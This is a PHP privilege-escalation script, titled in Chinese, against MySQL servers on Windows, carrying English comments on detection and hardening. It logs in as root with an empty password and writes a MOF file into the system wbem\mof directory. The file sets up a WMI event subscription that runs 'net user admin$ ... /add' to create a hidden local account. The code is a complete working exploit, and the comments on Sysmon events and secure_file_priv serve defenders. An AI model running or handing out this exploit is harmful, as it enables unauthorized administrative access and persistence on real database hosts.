
MySQL远程提权php版

<?php

// Connection parameters. The script assumes a MySQL instance reachable as
// root with an empty password; that weak credential is the precondition
// everything below depends on, and it is the first thing a hardening review
// should remove (set a password, restrict root to localhost, and do not
// expose the server to remote clients).
$mysql_server_name='localhost';
$mysql_username='root';
$mysql_password='';
$mysql_database='mysql';
// NOTE: the ext/mysql functions (mysql_connect, mysql_query, mysql_close)
// were removed in PHP 7, so this only runs on PHP 5.x. Also, the fourth
// parameter of mysql_connect() is the boolean $new_link, not a database
// name; the non-empty string here is simply coerced to true and the database
// is actually selected by mysql_select_db() below. The return value is not
// checked, so a failed connection is not reported.
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
// Command that the WMI consumer below would run: it creates a local user
// account. The "$" in the user name is literal because "$ " (followed by a
// space) is not a PHP variable reference. From a defender's view, unexpected
// local account creation on a database host is the observable effect.
$cmdshell="net user admin$ qwe!@#123qwe /add";
// MOF (Managed Object Format) text describing a WMI permanent event
// subscription in root\subscription: an __EventFilter that fires on
// Win32_LocalTime when Second = 5, an ActiveScriptEventConsumer that runs
// JScript through WScript.Shell, and a __FilterToConsumerBinding linking the
// two. The heavy backslash escaping exists because the PHP double-quoted
// string, the MOF string literals and the JScript string literal each consume
// one level (and the MySQL string literal in $sql presumably consumes another;
// not verified here).
// Detection: creation of these three object types in root\subscription is a
// well-known persistence indicator (Sysmon event IDs 19/20/21 cover
// WmiEventFilter / WmiEventConsumer / WmiEventConsumerToFilter); inventory
// existing subscriptions and alert on new ones.
$payload = "#pragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\")

instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\Cimv2\";
Name = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};

instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\"WScript.Shell\\\")\\nWSH.run(\\\"$cmdshell\\\")\";
};

instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($mysql_database,$conn);
// SELECT ... INTO OUTFILE writes the payload into the WMI MOF autoload
// directory. This only works when the MySQL account holds the FILE privilege
// and the mysqld process itself has write access to that system directory,
// i.e. the server runs with excessive (SYSTEM-level) rights.
// Mitigations: set secure_file_priv to a dedicated directory or NULL to
// disable file export entirely, run mysqld under a dedicated low-privilege
// service account that cannot write under %SystemRoot%\System32, and do not
// grant FILE to application accounts. File creation in the wbem\mof
// directory is itself a strong detection signal.
$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";
// $result is never inspected; a failed write (missing privilege,
// secure_file_priv restriction, file already existing) is silently ignored.
$result=mysql_query($sql);
mysql_close($conn);
?>